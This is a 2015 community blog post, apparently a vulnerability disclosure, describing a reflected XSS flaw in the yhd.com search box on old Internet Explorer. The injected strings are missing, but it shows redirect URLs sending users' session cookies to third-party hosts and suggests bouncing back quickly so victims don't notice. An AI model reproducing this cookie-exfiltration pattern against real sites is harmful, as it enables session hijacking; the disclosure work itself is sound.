发现一号店首页曝出重大XSS漏洞，在IE8，IE9，IE10上均有此漏洞

2015-10-12 1357

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 发现一号店首页曝出XSS漏洞，在IE8，IE9，IE10上均有此漏洞1.进入一号店首页:http://www.yhd.com2.搜索第一个字符串或者第二个字符串：第一个：第二个：（这里说明下，第一个字符和第二个字符都是单引号，第三个字符是双引号，接着!--）搜索页面：3.

发现一号店首页曝出XSS漏洞，在IE8，IE9，IE10上均有此漏洞

1.进入一号店首页:

http://www.yhd.com

2.搜索第一个字符串或者第二个字符串：

第一个：

第二个：

（这里说明下，第一个字符和第二个字符都是单引号，第三个字符是双引号，接着!--）

搜索页面：

3.在IE8，IE9，IE10上按下搜索键

页面跳转到：

http://wz.cn/?p=test_cookie=1; abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=2.40580330.87011629.1444660093687.1444660093687.1444660713109; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=22.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=18373150176C65FE11EB46BA041B0729

或者：

http://wz0.cn/?p=abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=3.40580330.87011629.1444660093687.1444660713109.1444661000125; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=23.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=B1DE4F8D449DC5B8C133259F19339223

注：当页面跳转到第三方网站后，存储完用户信息后，可以再跳到一号店的首页，如果这个过程速度快，用户可能没有察觉到，当然360卫士是拦截了第一个，不过第二个好像没有拦截。

发现一号店首页曝出重大XSS漏洞，在IE8，IE9，IE10上均有此漏洞

发现一号店首页曝出XSS漏洞，在IE8，IE9，IE10上均有此漏洞

1.进入一号店首页:

2.搜索第一个字符串或者第二个字符串：

3.在IE8，IE9，IE10上按下搜索键

热门文章

最新文章

相关课程

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

发现一号店首页曝出重大XSS漏洞，在IE8，IE9，IE10上均有此漏洞

发现一号店首页曝出XSS漏洞，在IE8，IE9，IE10上均有此漏洞

1.进入一号店首页:

2.搜索第一个字符串或者第二个字符串：

3.在IE8，IE9，IE10上按下搜索键

热门文章

最新文章

相关课程

相关电子书